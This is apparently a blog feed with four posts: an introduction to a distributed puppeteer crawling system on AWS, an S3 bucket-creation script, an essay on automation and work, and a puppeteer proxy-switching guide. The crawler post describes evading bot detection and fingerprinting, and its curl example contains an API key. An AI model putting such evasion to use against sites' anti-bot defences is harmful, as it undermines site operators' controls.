<li><em>(This article)</em> The first part of the series motivates the development of the crawling infrastructure, introduces the architecture of the software and demonstrates how the crawling backend works at a high level.</li>
<li>The second part covers the installation of the distributed crawling infrastructure within the AWS cloud infrastructure and tests the freshly deployed stack with a test crawl task.</li>
<li>In the third part of this tutorial series, a crawl task with the top 10.000 websites of the world is created. The downloaded Html documents are stored in s3. For the top 10.000 websites, we use the scientific <a href="https://tranco-list.eu/">tranco list</a>: A Research-Oriented top sites ranking hardened against manipulation. As a concluding task, we run business logic on the stored Html files. For example, we extract all urls from the Html documents or we run analytics on the <code><meta></code> tags …</li></ol><p>In this blog article I will introduce my most recent project: <a href="https://github.com/NikolaiT/Crawling-Infrastructure">The distributed crawling
infrastructure</a> which allows to crawl any website with a low-level Http library or a fully fledged chrome browser configured to evade bot detection attempts.</p>
<p>This introduction is divided into three distinct blog articles, because one blog article would be too large to cover this huge topic.</p>
<ol>
<li><em>(This article)</em> The first part of the series motivates the development of the crawling infrastructure, introduces the architecture of the software and demonstrates how the crawling backend works at a high level.</li>
<li>The second part covers the installation of the distributed crawling infrastructure within the AWS cloud infrastructure and tests the freshly deployed stack with a test crawl task.</li>
<li>In the third part of this tutorial series, a crawl task with the top 10.000 websites of the world is created. The downloaded Html documents are stored in s3. For the top 10.000 websites, we use the scientific <a href="https://tranco-list.eu/">tranco list</a>: A Research-Oriented top sites ranking hardened against manipulation. As a concluding task, we run business logic on the stored Html files. For example, we extract all urls from the Html documents or we run analytics on the <code><meta></code> tags found in the <code><head></code> section of the documents.</li>
</ol>
<h2>Why would I even need a distributed crawling infrastructure?</h2>
<p>You most likely <strong>do not need</strong> a distributed crawling infrastructure. If your requirements are to scrape a single website, you can create a simple script that uses <code>lxml</code> and <code>beautifulsoup</code> in the case you program with Python. Alternatively, you could write a Nodejs program that uses <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> if you need to orchestrate a real browser. That approach is sufficient for most cases.</p>
<p>However, if you are already an experienced scraping script author, you might have encountered the following limitations:</p>
<ol>
<li>If you run the crawling script on your development machine, you will <strong>need to keep the machine running as long as the task is not finished.</strong> That is annoying.</li>
<li>In case you are using an VPS to run your crawling script, you don't have to worry about the execution time of your crawling program. However, your VPS scales vertically. What if you want to control more than three browsers at the same time? This becomes increasingly more expensive in terms of RAM and CPU costs. Therefore, running a large crawling operation on one single server instance is not scaleable.</li>
<li>When you store the crawled data in a database, disk space becomes an issue if you are launching large tasks. Therefore, at some point you will need to outsource storage to the cloud.</li>
</ol>
<p>Summarized, if you want to create multiple, long running and computationally expensive crawling jobs in a concurrent fashion, the distributed crawling infrastructure presented in this article might be for you.</p>
<h2>The problems that the distributed crawling infrastructure solves</h2>
<p>In the following sections, I outline some of the problems and hurdles the crawling infrastructure tackles.</p>
<h3>Handling of large data-sets</h3>
<p>The crawling infrastructure stores crawled data in compressed form in the cloud. Currently, the most used storage solution is AWS S3. But you can store the crawled data in any cloud storage of your choice.</p>
<p>That way you don't have to worry about local storage restrictions.</p>
<h3>Dynamic allocation of crawling backends</h3>
<p>The crawling infrastructure gives you full choice over the computational resource that executes the crawling code. By default, the crawling worker is executed on AWS Lambda instances, but you could use any other backend such as</p>
<ol>
<li>AWS EC2 Spot instances</li>
<li>Azure cloud functions</li>
<li>Digital Ocean Droplets</li>
</ol>
<h3>Detection of the crawling</h3>
<p>A huge contribution of the distributed crawling software is the attempt to obfuscate the automated crawling from bot detection approaches. For that reason, the crawling infrastructure uses the puppeteer controlled chromium browser and configures the browser in such a way that makes it hard for anti-bot techniques and fingerprinting scripts to detect the browser.</p>
<p>A wide array of techniques are used, such as user agent obfuscation, changing of http headers such as Accept-Language, proxy support, setting of chrome command line parameters and much more.</p>
<h3>Separation of Concerns</h3>
<p>Due to it's design into five distinct components, it is straightforward to debug the crawling infrastructure.
Distributed system are complicated by design, therefore, separating such a software in individual components reduces this complexity.</p>
<h2>Requirements for installing & controlling the crawling infrastructure</h2>
<p>Running your own scaleable crawling infrastructure is only possible if you have access to the following resources:</p>
<ol>
<li>You own a AWS/Azure/Google Cloud account</li>
<li>You have the requirements to execute long running crawl tasks over hundred thousand and millions of items</li>
<li>You know the implications of what you are doing</li>
</ol>
<p>In order to follow this tutorial, you will at least <strong>require an
AWS account</strong>. We will make use of the following AWS services:</p>
<ul>
<li><strong>AWS Lambda</strong> as crawling backend</li>
<li><strong>AWS S3</strong> to store crawled Html data</li>
<li>An <strong>AWS EC2</strong> instance used as a master server that schedules the crawl task and hosts the mongodb that we use a queue. This is the central part of the crawling infrastructure.</li>
</ul>
<h2>The architecture of the crawling infrastructure</h2>
<p>The whole codebase is written in Typescript, which eliminates some of the problems that large nodejs projects inevitably have when they begin to grow.
The architecture of the crawling infrastructure is divided into five parts.</p>
<ol>
<li><strong>The Api</strong> that accepts, lists, deletes and manages crawl tasks.</li>
<li><strong>A scheduler</strong> that polls the database for pending crawl tasks and launches worker instances if there is more crawling work to do.</li>
<li><strong>A mongodb database instance</strong> that stores crawling metadata and the items to be crawled. No actual results will be stored in the database, only crawling metadata. The database needs to be remotely accessible.</li>
<li><strong>The crawling worker</strong>. When a crawling worker is launched, it grabs items from the database and makes progress on them. The crawling worker implements all the logic responsible for launching a browser, making it undetectable and executing the crawling logic.</li>
<li><strong>The crawling function</strong>. This is the actual logic of what actually should be done on the crawled website. For example, if you want to scrape Google, the <a href="">Google Scraper</a> would be chosen as a crawling function. On the other side, if you only want to render & store the html of a website, a <a href="">simple render</a> crawling functions suffices.</li>
</ol>
<p>The architecture of the crawling infrastructure is quite complex and is summarized in the diagram below:</p>
<p><img alt="architecture of the crawling infrastructure" src="https://github.com/NikolaiT/Crawling-Infrastructure/raw/master/docs/diagram/arch_diagram2.png" title="crawling infra arch"></p>
<h2>Practical part: Launching the first crawl task</h2>
<p>Now that we have introduced the crawling infrastructure from a theoretical point of view, it's time to start with something practical: We will test the <strong>crawler</strong> and then create the first simple crawl tasks locally.</p>
<p>Therefore, we won't create a distributed infrastructure just yet. That is saved for the two other parts of this tutorial.</p>
<p>In order to follow this excursion, you will need to have installed the following software:</p>
<ol>
<li>Nodejs, check out the <a href="https://linuxize.com/post/how-to-install-node-js-on-ubuntu-18.04/">installation instructions</a></li>
<li><code>typescript</code>, installed globally with <code>sudo npm install -g typescript</code></li>
<li>docker, see Ubuntu 18.04 <a href="https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-18-04">installation instructions</a></li>
<li><code>npm</code> and <code>yarn</code></li>
</ol>
<p>If that is the case, go to cozy place on your local file system and download the crawling infrastructure project with the command:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/Crawling-Infrastructure.git
<span class="nb">cd</span> Crawling-Infrastructure/
</code></pre></div>
<p>In order to test the crawler, we use the following commands to create the docker crawler image.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> crawler/
npm install
<span class="c1"># install & compile lib</span>
<span class="nb">cd</span> ../lib
npm install
tsc
<span class="nb">cd</span> ../crawler
./build.sh
</code></pre></div>
<p>After the image was successfully built, you can run the integration test with the following command:</p>
<div class="highlight"><pre><span></span><code>mocha --timeout <span class="m">300000</span> -r ts-node/register test/integration_tests.ts
</code></pre></div>
<p>The mocha tests should run successfully. If that is the case, we may proceed with running some local crawl tasks against the running docker image.</p>
<h3>Testing the crawler locally</h3>
<p>Now that we have successfully tested the crawler locally, let's see if we can actually crawl a simple url with it.</p>
<p>First launch the docker crawler image in one terminal window with the following command:</p>
<div class="highlight"><pre><span></span><code>docker run -p <span class="m">4444</span>:4444 --env <span class="nv">PORT</span><span class="o">=</span><span class="m">4444</span> tschachn/crawl_worker:latest
<span class="o">[</span>DOCKER<span class="o">]</span> Starting X virtual framebuffer using: Xvfb :99 -ac -screen <span class="m">0</span> 1280x720x16 -nolisten tcp
<span class="o">[</span>DOCKER<span class="o">]</span> Starting worker server
CrawlWorker<span class="o">[</span>6c279a53f03d<span class="o">]</span> with pid <span class="m">9</span> listening on port <span class="m">4444</span>
</code></pre></div>
<p>And now on a second terminal window, confirm that the crawler docker image is running by issuing the following command:</p>
<div class="highlight"><pre><span></span><code>curl http://localhost:4444/
<span class="o">{</span>
<span class="s2">"status"</span>: <span class="m">200</span>,
<span class="s2">"message"</span>: <span class="s2">"Welcome to CrawlWorker running on 6c279a53f03d"</span>,
<span class="s2">"version"</span>: <span class="s2">"1.1.5"</span>,
<span class="s2">"author"</span>: <span class="s2">"Nikolai Tschacher <contact@scrapeulous.com> (https://scrapeulous.com)"</span>
<span class="o">}</span>
</code></pre></div>
<p>Everything works fine! Now it's time to crawl a simple website that reflects our IP address. As you can see we pass an empty aws configuration.</p>
<div class="highlight"><pre><span></span><code>curl http://localhost:4444/invokeRequestResponse <span class="se">\</span>
-H <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span>
-d <span class="s1">'{"API_KEY": "kfTP6E7GgDTtIBZnUQq4skrHGWcuPe1Z",</span>
<span class="s1"> "aws_config": {</span>
<span class="s1"> "AWS_ACCESS_KEY": "",</span>
<span class="s1"> "AWS_SECRET_KEY": "",</span>
<span class="s1"> "AWS_REGION": "",</span>
<span class="s1"> "AWS_BUCKET": ""</span>
<span class="s1"> },</span>
<span class="s1"> "local_test": true,</span>
<span class="s1"> "function_code": "class Get extends HttpWorker { async crawl(url) { let result = await this.Got(encodeURI(url)); return result.body; } }",</span>
<span class="s1"> "items": ["https://ipinfo.io/json"]}'</span>
</code></pre></div>Dynamic creation of S3 buckets in many regions2020-02-26T17:50:00+01:002020-02-26T17:50:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-26:/2020/02/26/dynamic-s3-bucket-creation-in-many-regions/<p>Quick script that demonstrates how to create s3 buckets in many regions.</p><h2>Create S3 buckets dynamically with a bash script</h2>
<p>The script below creates S3 buckets in the AWS regions that are specified at the beginning of the script.</p>
<p>Just edit the array named <code>regions</code> and modify the slug and the script will create buckets in the form <code>{slug}-{aws-region}</code> in all the regions specified.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
<span class="c1"># create_s3_buckets.sh</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="nv">regions</span><span class="o">=(</span>us-east-2 us-east-1 eu-central-1 eu-west-1 eu-west-2 eu-west-3<span class="o">)</span>
<span class="k">for</span> region <span class="k">in</span> <span class="s2">"</span><span class="si">${</span><span class="nv">regions</span><span class="p">[@]</span><span class="si">}</span><span class="s2">"</span>
<span class="k">do</span>
<span class="c1"># specify your bucket name here</span>
<span class="nv">bname</span><span class="o">=</span><span class="s2">"slug-</span><span class="nv">$region</span><span class="s2">"</span>
<span class="nb">echo</span> <span class="s2">"creating </span><span class="nv">$bname</span><span class="s2"> aws bucket"</span>
<span class="c1"># https://docs.aws.amazon.com/cli/latest/reference/s3api/create-bucket.html#examples</span>
<span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$region</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"us-east-1"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
aws s3api create-bucket --bucket <span class="nv">$bname</span> --region <span class="nv">$region</span> --acl private
<span class="k">else</span>
aws s3api create-bucket --bucket <span class="nv">$bname</span> --region <span class="nv">$region</span> --acl private --create-bucket-configuration <span class="nv">LocationConstraint</span><span class="o">=</span><span class="nv">$region</span>
<span class="k">fi</span>
<span class="k">done</span>
</code></pre></div>
<p>Run the script with the following commands:</p>
<div class="highlight"><pre><span></span><code>chmod +x create_s3_buckets.sh
./create_s3_buckets.sh
</code></pre></div>The value of work in the coming decades2020-02-20T01:37:00+01:002020-02-21T13:05:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-20:/2020/02/20/the-value-of-work-in-the-coming-decades/<p>This article makes an attempt to understand and predict the <strong>consequences of the rapid automation/computerization</strong> in the realm of human work. I make them based on my experiences as a software engineer, while I am fully aware that programming is not threatened to be eradicated by automation in the next decades. For that reason, I realize that I am holding a privileged position. </p>
<p>In the second part of the article, I argue <strong>why work in general should be voluntary</strong> within a welfare state and why the governments main task should be to create a situation where humans dont' have to work in order to obtain the bare essentials such as housing, food and healthcare.</p>
<h2>What is work?</h2>
<p>So what exactly is work? Work is something that sucks, right? After all, if I could spend my time without having to worry about finances, I'd rather spend my days at a tropic beach drinking some beers and doing <strong>exactly nothing</strong>.</p>
<p>But for how long? When would my natural urge to be productive kick in? I assume that after a couple of days, I would start a project that consumes my time. But since I don't have to worry about it's financial …</p><p>This article makes an attempt to understand and predict the <strong>consequences of the rapid automation/computerization</strong> in the realm of human work. I make them based on my experiences as a software engineer, while I am fully aware that programming is not threatened to be eradicated by automation in the next decades. For that reason, I realize that I am holding a privileged position. </p>
<p>In the second part of the article, I argue <strong>why work in general should be voluntary</strong> within a welfare state and why the governments main task should be to create a situation where humans dont' have to work in order to obtain the bare essentials such as housing, food and healthcare.</p>
<h2>What is work?</h2>
<p>So what exactly is work? Work is something that sucks, right? After all, if I could spend my time without having to worry about finances, I'd rather spend my days at a tropic beach drinking some beers and doing <strong>exactly nothing</strong>.</p>
<p>But for how long? When would my natural urge to be productive kick in? I assume that after a couple of days, I would start a project that consumes my time. But since I don't have to worry about it's financial merits, can it really considered to be <em>work</em>?</p>
<p>My attempt to define work is the following:</p>
<ol>
<li>Work pays the bills.</li>
<li>Work is something that produces value for the recipient of effort.</li>
<li>The amount of money that work generates usually correlates with the amount of value it produces.</li>
</ol>
<h2>What if some people stop producing value?</h2>
<p>One of the fundamental issues of our modern times is the fact that our society becomes more complex each passing day. It's practically impossible to grasp even narrow professional fields in its entirety. People in their professions are usually extremely specialized.</p>
<p>Navigating successfully within a certain industry requires years of education and training. In the next decades, there will be an enormous demand for this workforce. But there is only a certain percentage in the population that has the </p>
<ol>
<li>Motivation, discipline and interest</li>
<li>Required cognitive ability and health</li>
<li>Stable socio-economic background</li>
</ol>
<p>to become a highly sought-after specialist. For some percentage of the population, those jobs will be <strong>unattainable</strong>. I don't know how high this percentage is, but I assume it's between 20% to 70% of a given countries population and therefore significant.</p>
<p>Right now, this is not such a huge problem, because there is still enough labour that doesn't require specialized skill. However, what happens when employees in fast food chains go out of labour, because <a href="https://streetfightmag.com/2019/04/11/measuring-the-impact-of-mcdonalds-push-into-automation-personalization/">McDonald's decides to fully automate their restaurants?</a>. </p>
<p>What happens when the whole retail sector, which still amounts to one of the most prevalent job sources in industrialized countries, <a href="https://www.theguardian.com/technology/2017/aug/16/retail-industry-cashier-jobs-technology-unemployment">decides to lay off a large percentage of their employees</a> because retail jobs are not longer demanded?</p>
<p>For example, <a href="https://www.youtube.com/watch?v=tPslcAKK8Uc">Amazon Go</a> launched around 25 stores that have so called <strong>Just Walk Out Technology</strong>. Even though Amazon predicted the number of opened Go stores too optimistically, they have proven that supermarkets without cashiers with fully automated checkout technology are technically possible.</p>
<p>Right now, the checkout process might be <a href="https://www.youtube.com/results?search_query=amazon+go+exploit">exploitable to some degree</a>, but the technology will be fully mature in the coming decade.</p>
<p>Those developments don't suddenly imply that supermarkets and fast food chains won't require employees anymore. It means that a supermarket can be run with <strong>two employees instead of five</strong>.</p>
<p>What happens when the people that got laid off have a hard time to find new jobs? Realistically, workers probably won't have any issue finding new employment, since the unemployment rate in the US is at a record low in 2020. Therefore, unemployment caused by automation does not put people into hopeless job situations in the labour market of our current time. </p>
<p>However, the underlying automation and digitization shift will only pick up motion and societies will gradually switch to labour systems where low skilled cognitive work is no longer sought after. Simple as that. It doesn't matter if it takes another ten, twenty or thirty years, but I can guarantee that in the next decades, maybe even as far away as the year 2050, <strong>automation and technology advances will cause radical changes</strong> in the labour market:</p>
<ol>
<li>Truck driving on highways will be fully automated in the year 2050. Logistics within cities will be probably partially automated.</li>
<li>Supermarkets, fast food chains, buses, taxis will be partially autonomous.</li>
<li>Most low skilled work in factories will be automated, as it is already the case.</li>
<li>Some subfields in medicine and law will be automated. For instance, some surgeries are already heavily assisted with <a href="https://en.wikipedia.org/wiki/Robot-assisted_surgery">surgery robots</a>.</li>
<li>Areas in software development could be partially replaced with AI, such as UI generation, testing and other fields.</li>
</ol>
<h2>What jobs are safe?</h2>
<p>There is a requirement for human intelligence amidst automated processes. For example, you cannot run a supermarket without at least one or two employees, independently of the level of automation.</p>
<p>What happens when a child crashes into shelves at the supermarket? Who cleans up to mess and refills the shelves? Who puts items back into their appropriate shelves when items were left at the wrong place? Who stops people from manipulating the check-out technology in supermarkets? Who repairs said technology?</p>
<p>The same applies to cleaning services. Smart cleaning robots might learn how to vacuum large hotel complexes on their own, but they will always get stuck, even if the reason are not self-inflicted. Cleaning a room is a immensely complex task. I don't think that there will be a viable general purpose cleaning machine that can handle all the complexities and nuances of cleaning arbitrary hotel rooms in the next 30 years.</p>
<p>It seems that the general rule of automation is: <strong>The more you control and design the work environment, the easier it is to automate</strong>.</p>
<p>Real life is simply too complex to successfully automate all work processes. Therefore, it's realistic to say that job fields heavily affected from automation will require less human employees with a broader technical skillset. Nevertheless, it still holds true that a large percentage of low skill labour will no longer be demanded.</p>
<p>There will be a extremely <strong>high demand for nurturing amd emotional work</strong> such as in health care and psychology. Jobs in nursing, social work and in retirement homes should not be automated, because it would disregard simple ethics and human dignity.</p>
<p>Furthermore, in the coming decades, there will be an enormous demand for all kinds of engineers, information technology professionals, scientists, medical professionals and managers. Content creation, entertainment and the service industry will also require a lot of people.</p>
<p>Furthermore, simply because some jobs can be automated doesn't mean that they will go away. After all, efficiency is not the sole criteria when it comes to a sound business plan.</p>
<h2>The value of work</h2>
<p>Now that it was established that modern societies have a large demand for highly specialized work, the purpose of this essay is clarified.</p>
<p>In modern capitalist countries, <strong>I assume that roughly 20% of the workforce amounts to 80% of real value generated (pareto principle)</strong>. This is a bold and problematic claim, since it appears to diminish the work of so many people.</p>
<p>Let me explain.</p>
<p>What I mean with that is that companies that are in industries that can be scaled horizontally require a constant amount of employees which produce an arbitrarily large amount of yield. Examples?</p>
<ol>
<li><strong>BMW</strong>, a well known German car manufacturer employs 134 thousand people and produced around 2.5 million cars in 2018 with a revenue of 97 billion Euros. This means that on average, one employee of BMW is responsible for <strong>723k Euros in annual revenue</strong>. </li>
<li><strong>Alphabet Inc.</strong>, the conglomerate behind Google employs 118k people in 2019 and has an annual revenue of 161 billion Dollars. It follows, that on average an Alphabet Inc. employee is responsible for <strong>1.36 million Dollars in revenue</strong> in 2019.</li>
<li><strong>Royal Dutch Shell</strong> had 82 thousand employees in 2018 with 388 billion Dollars in revenue. It follows that the average Shell employee brings in <strong>4.7 million Dollars revenue</strong> in the year 2018.</li>
</ol>
<p>[Sources: Wikipedia]</p>
<p>What does that mean? Does it mean that a Shell employee produces more value than a teacher in a public school? After all, the teacher has probably a net revenue of <strong>-50.000 dollars annually</strong>, paid by the taxpayer.</p>
<p>However, the teacher's work is indispensable, because without it, there wouldn't be educated people working in the highly successful companies above. If the companies themselves would educate their workforce, it would be possible to put an tangible number to the value generated by teachers.</p>
<p>Let's assume you are one of the many low paid workers such as cashiers or cleaning personal. Those jobs make around 12.50 Dollars per hour which would put their annual revenue to roughly 24 thousand dollars. How does 24.000 Dollars compare to 115.000 Dollars in the case of the <a href="https://www.payscale.com/research/US/Employer=Google%2C_Inc./Salary">average Google salary</a>? It's absurd.</p>
<p>Put differently, the value of work depends on how scalable and sought after the nature of your work is.</p>
<p>There is no easy solution here. People are differently gifted, distinctly lucky and from different socio-economic backgrounds. There will never be equality in that sense. The modern capitalistic system creates an enormous pressure on individuals to compete with each other. There is a global market for virtually any service and material good.</p>
<p>It is easy to see that the extremely competitive global capitalistic system yields a small percentage of highly successful companies that are the winners of the global market. The same applies to the workforce. </p>
<h2>Working harder?</h2>
<p>The individual solution seems to be the mantra of working harder, have a better education, be more competitive. That's all nonsense, since <strong>the globalized market doesn't care about your individual effort</strong>. It will always reward the top tier companies and workers, while the lower ranks are left empty-handed.</p>
<p>When an individual is immensely driven, has the luck to come from a good socio-economic background and is intelligent enough, the competitive world embraces you with open arms. However, for many people, this relentless competition is not very attractive and they choose to not participate in it.</p>
<p>After all, why is it purposeful to always strive for more money, more consumerist goods and more status symbols. </p>
<p><strong>It seems to me that the allure of what money can buy is limited to the freedom to not participate in the hamster wheel anymore.</strong></p>
<p>So what is the solution?</p>
<h2>The work is already done</h2>
<p>The work is done. It's time to enjoy the benefits of centuries of hard work of humanity.</p>
<p>I am not an economist or have a large understanding of socio-economic systems, but let's take a huge leap back in time and look at what work was for stone age societies.</p>
<p>Our ancestors needed <strong>safety and food</strong>. When they were attacked, they tried to defend themselves and when they were hungry they were either looking for fruits, nuts or plants or they hunted animals. When they moved from one place to another, they needed to carry the little belongings they had to the next place.</p>
<p>So work for them was mostly gathering enough nutrients, surviving threats and finding a suitable cave/shelter.</p>
<p>Isn't it possible right now to provide exactly that for all citizens of rich countries for free?! The government's main task should be to provide the bare essentials:</p>
<ol>
<li>Food and water</li>
<li>Housing </li>
<li>Education and Health</li>
<li>Maybe a monthly basic income of 400$ on top of that</li>
</ol>
<p>for free to everyone in the country that doesn't hold a job which generates more money.</p>
<p>Let me be perfectly clear about that: <strong>If a citizen does not want to work, they should have the option to receive the bare minimum in order to survive without any obligations</strong>.</p>
<p>Of course such a policy would create all sorts of problems:</p>
<ol>
<li>People that don't work might become depressed and lose perspective. However, if they find purpose in work, they can always look for a job in demand or do charitable work. They can do purposeful jobs without having the burden of profitability.</li>
<li>Some people would attempt to cheat the system by renting away the free housing or sell the food in order to buy alcohol or drugs.</li>
<li>Some people would destroy government property by not cleaning up the housing or destroying the property.</li>
</ol>
<p>For both cases 2) and 3) there should be penalties by the government such as jail time. However, the main idea should not be punishment, it should be aiming to support and help.</p>
<h2>How to finance it?</h2>
<p>Well, the social system that I describe above is already in place in many countries in Europe such as Germany. It is mostly paid by tax income of companies and the medium to high earning middle class. The only difference is, that <strong>the government mindlessly forces unemployed people to find new jobs</strong>, despite the fact that the work does not produce any value. The mantra apparently is: We want you to work, doesn't matter that the work is not meaningful. The structuring element of work is supposedly enough.</p>
<p>I think this stubborn and totally senseless requirement to force people to work is completely outdated. It should be a human right to have the minimal necessity to survive in your country. <strong>Nobody should be able to force you to do work and put pressure on you</strong>. Nobody should have the right to stigmatize you based on the fact that you don't share the same Puritan work ethic. </p>
<p>Of course, if you chose to not work, <strong>you won't be allowed to:</strong></p>
<ol>
<li>Own a car or motorbike</li>
<li>Go to vacations or fly</li>
<li>Buy fancy material objects</li>
</ol>
<p>Nor should you ever have a right for any other luxurious things. The governments main task is to provide you with the bare necessities, while it should try to avoid to create new slums and ghettos by creating large housing projects.</p>
<p>Furthermore, the government should be allowed to force children to attend school for at least 9 years and make university tuition free.</p>
<h2>Benefits of not working</h2>
<p>What are the benefits of such a pressure free environment where your health, housing and food are guaranteed to be provided for?</p>
<p>First of all, you can freely chose to work in whatever fields you want. You can pursue your real passions, even if your sole passion in life might be to chill in bed all day long and do nothing.</p>
<p>If you want to work, there is always enough volunteering work to do in hospitals, elderly homes, parks or other public institutions. Maybe the government <strong>should even have the right to force the people to do such charitable work for 12 hours a week, when they decide not to work</strong>. I am not sure about that.</p>
<p>And most people will chose to find a job such that they can afford to go to vacations, buy consumerist goods or rent nice apartments. Those things are incentive enough for the majority of the population to find a profitable job. <strong>However, bare survival should not be an incentive in order to work!</strong>.</p>
<h2>Problems of people not working</h2>
<p>There is a range of possible scenarios that would happen when the supply of low skilled workers would rapidly decrease. This workforce would be inclined to not work low paid jobs anymore, because the free government assistance would have had the same financial purchasing power compared to the income of low paying jobs. So what would happen as a consequence?</p>
<p>Companies <strong>would increase the salary of low paid jobs</strong> while simultaneously increasing the prices of their goods. Hence, a supermarket still had cashiers and they would be paid better, but the items in the supermarket would be more pricey. However, because the workers are paid more, the incentive and pressure to automate those business processes would rapidly increase. This means that at some point, there will be supermarkets that are almost fully automated and the prices of the items can be decreases again to beat the competition. The competition either adapts or is defeated.</p>
<p>Another option is that the workforce from economically weaker countries will immigrate to those countries in order to do the jobs. This should be made illegal by the government, because it doesn't change the underlying problem.</p>
<p>Alternatively, if worker immigration was legal, the immigrants should have the same benefit as the citizens. Then the same scenario as above would happen. Therefore, immigration doesn't matter in this thought experiment.</p>
<h2>What if automation does not reduce the quantity of work?</h2>
<p>There are many experts that predict that automation and digitalization <a href="https://www.nature.com/articles/d41586-018-07501-y">will not reduce the overall quantity of work</a>, it will merely shift the labour markets towards a direction that requires workers to have better educations, higher skillets and more specific skills.</p>
<p>For example, <a href="https://www.nature.com/articles/d41586-018-07501-y">around 40% of the workforce</a> was employed in agriculture in the year 1900. Nowadays, only 2% of the US population works in agriculture. Does this mean that millions of people are no longer employed? Not at all, other sectors emerged and new business fields opened and demanded a large workforce. </p>
<p>Therefore, it can be argued that increased computerization leads to more demand in work, not less. As long as we don't have General Artificial Intelligence, the human brain is simply not exchangeable. And it's highly dubious that we ever reach the point of singularity.</p>How to dynamically change http/s proxy servers in puppeteer?2020-02-14T14:06:00+01:002020-02-14T14:06:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-14:/2020/02/14/dynamically-changing-puppeteer-http-proxy/<p><strong>Find the <a href="https://incolumitas.com/2020/12/20/dynamically-changing-puppeteer-proxies/">updated blog post here.</a></strong></p>
<p>Chrome/Puppeteer has a couple of annoying issues when trying to use <strong>http/s proxies</strong> and <strong>socks proxies</strong> with the chrome browser controlled by puppeteer. The most pressing issues are the following:</p>
<ol>
<li><strong>Dynamically changing proxy servers: </strong> Once the chrome browser is started, it is not possible to change the proxy configuration any longer. A restart is required to switch proxy configuration.</li>
<li><strong>user/pass proxy authentication:</strong> The chrome browser does not support username/password proxy authentication <strong>for socks proxies</strong>. Puppeteer supports the http <a href="">proxy authentication</a> via the <code>page.authenticate()</code> function, but it does not have an equivalent for socks proxies.</li>
<li><strong>Per page proxies: </strong> Per page proxies are not supported with the chrome browser. The global proxy configuration applies to all pages and windows of a launched chrome process. It seems like the new module <a href="https://github.com/Cuadrix/puppeteer-page-proxy"></a> tries to solve this issue.</li>
</ol>
<p>For my purposes, I don't really care about problem 3). I don't need per page proxies anyway, since the crawling software I write runs with one browser tab at the time. However, issue 1) is a mandatory requirement for me and thus needs to be solved.</p>
<p>The reason is, I don't want to restart the browser …</p><p><strong>Find the <a href="https://incolumitas.com/2020/12/20/dynamically-changing-puppeteer-proxies/">updated blog post here.</a></strong></p>
<p>Chrome/Puppeteer has a couple of annoying issues when trying to use <strong>http/s proxies</strong> and <strong>socks proxies</strong> with the chrome browser controlled by puppeteer. The most pressing issues are the following:</p>
<ol>
<li><strong>Dynamically changing proxy servers: </strong> Once the chrome browser is started, it is not possible to change the proxy configuration any longer. A restart is required to switch proxy configuration.</li>
<li><strong>user/pass proxy authentication:</strong> The chrome browser does not support username/password proxy authentication <strong>for socks proxies</strong>. Puppeteer supports the http <a href="">proxy authentication</a> via the <code>page.authenticate()</code> function, but it does not have an equivalent for socks proxies.</li>
<li><strong>Per page proxies: </strong> Per page proxies are not supported with the chrome browser. The global proxy configuration applies to all pages and windows of a launched chrome process. It seems like the new module <a href="https://github.com/Cuadrix/puppeteer-page-proxy"></a> tries to solve this issue.</li>
</ol>
<p>For my purposes, I don't really care about problem 3). I don't need per page proxies anyway, since the crawling software I write runs with one browser tab at the time. However, issue 1) is a mandatory requirement for me and thus needs to be solved.</p>
<p>The reason is, I don't want to restart the browser each time I need to change the proxy. Some sites require a different proxy for each url. This would enforce a restart for each url, which prolongs the crawling process significantly.</p>
<p>It seems that the company Apify encountered problems with proxy authentication and thus released a intermediary nodejs proxy server that forwards proxy connections to the real proxy server. They created it back when <code>page.authenticate()</code> was not a part of puppeteer yet and made the following scenario possible:</p>
<div class="highlight"><pre><span></span><code>[Chrome with command line arg proxy-server=localhost:8000]
<===>
[Forwarding proxy server running on localhost:8000]
<===>
[Arbitrary proxy server requiring username:password auth]
</code></pre></div>
<p>The software is called <a href="https://github.com/apifytech/proxy-chain">proxy-chain</a> and there exists a informative <a href="https://blog.apify.com/how-to-make-headless-chrome-and-puppeteer-use-a-proxy-server-with-authentication-249a21a79212">blog article that explains how the software works</a>.</p>
<p>However, the current version of <code>proxy-chain</code> only solves the issue with proxy authentication. What we really want is to <strong>dynamically change the browser proxy within our puppeteer code</strong>.</p>
<p>In the remainder of the article our http/s proxy server will have the proxy string <strong>http://proxyuser:proxypassword@100.100.100.100:3128</strong></p>
<h2>Overview</h2>
<p>This is the state of the art of chrome browser proxy support with puppeteer. The contribution of this blog article is to enable to dynamically change http/s proxies via a <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">modified proxy-chain module</a>.</p>
<table>
<thead>
<tr>
<th>Proxy Scheme</th>
<th>Chrome Browser support</th>
<th>Authentication</th>
<th>Dynamic Proxy Change</th>
</tr>
</thead>
<tbody>
<tr>
<td>http/s</td>
<td>yes</td>
<td>with pptr <code>page.authenticate()</code>, not via command line</td>
<td>with <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">modified proxy-chain</a></td>
</tr>
<tr>
<td>socks4</td>
<td>yes</td>
<td>not a part of socks4</td>
<td>no, <code>proxy-chain</code> only supports http/s proxies</td>
</tr>
<tr>
<td>socks5</td>
<td>no</td>
<td>not possible</td>
<td>no</td>
</tr>
</tbody>
</table>
<h2>Dynamically changing proxy configuration from puppeteer code</h2>
<p>Even though it is possible to dynamically change the upstream proxy server in <code>proxy-chain</code> by setting an extra http header such as <strong>x-no-forward-upstream-proxy</strong>, this header would also be copied and sent to the upstream proxy. This is not what we want, since it would leak username/passwords of the proxystring to the website we want to crawl. This would be an horrendous idea.</p>
